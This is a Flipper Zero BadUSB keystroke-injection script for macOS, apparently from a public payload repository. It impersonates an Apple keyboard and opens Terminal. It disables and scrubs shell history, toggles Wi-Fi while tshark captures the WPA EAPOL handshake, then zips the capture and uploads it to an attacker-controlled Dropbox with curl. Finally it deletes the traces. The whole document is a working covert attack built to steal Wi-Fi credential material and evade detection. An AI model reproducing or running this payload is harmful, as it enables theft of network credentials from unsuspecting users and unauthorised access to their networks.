Flipper/BadUSB/MacOS-narstybits/Executions/EAPOL Handshake to Dropbox.txt

77 lines
1.9 KiB
Plaintext
Raw Normal View History

2023-08-09 04:59:16 +00:00
REM This script discreetly grabs the .PCAP that will contain the FOUR EAPOL handshake keys
REM then zips the file renaming it Captured Handshake and sends it directly to your dropbox API.
REM Replace '<API ACCESS TOKEN>' with your actual API access token.
REM Requirements Wireshark (tshark) can download using the command 'brew install wireshark'
REM Dropbox API token, you can find Documentation under my Executions readme.
REM Author: Narsty
REM Title: EAPOL Handshake to Dropbox
REM Version 1.0 MacOs
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 2000
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING networksetup -setairportpower en0 off
DELAY 500
ENTER
DELAY 1000
STRING tshark -i en0 -w ~/Desktop/captured.pcap &
DELAY 1000
ENTER
DELAY 6000
STRING networksetup -setairportpower en0 on
DELAY 500
ENTER
DELAY 3000
STRING pkill -f tshark
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 2000
STRING echo 'cd ~/Desktop && zip -r "CapturedHandshake.zip" captured.pcap && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <API ACCESS TOKEN>" -H "Dropbox-API-Arg: {\"path\": \"/Backup/CapturedHandshake.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"CapturedHandshake.zip"' > upload.sh
DELAY 500
ENTER
DELAY 500
STRING chmod +x upload.sh
ENTER
DELAY 500
STRING nohup ./upload.sh >/dev/null 2>&1 &
DELAY 500
ENTER
DELAY 10000
STRING rm ~/Desktop/captured.pcap
DELAY 500
ENTER
STRING rm ~/Desktop/CapturedHandshake.zip
DELAY 500
ENTER
STRING rm upload.sh
DELAY 500
ENTER
DELAY 5000
GUI w
DELAY 500
ENTER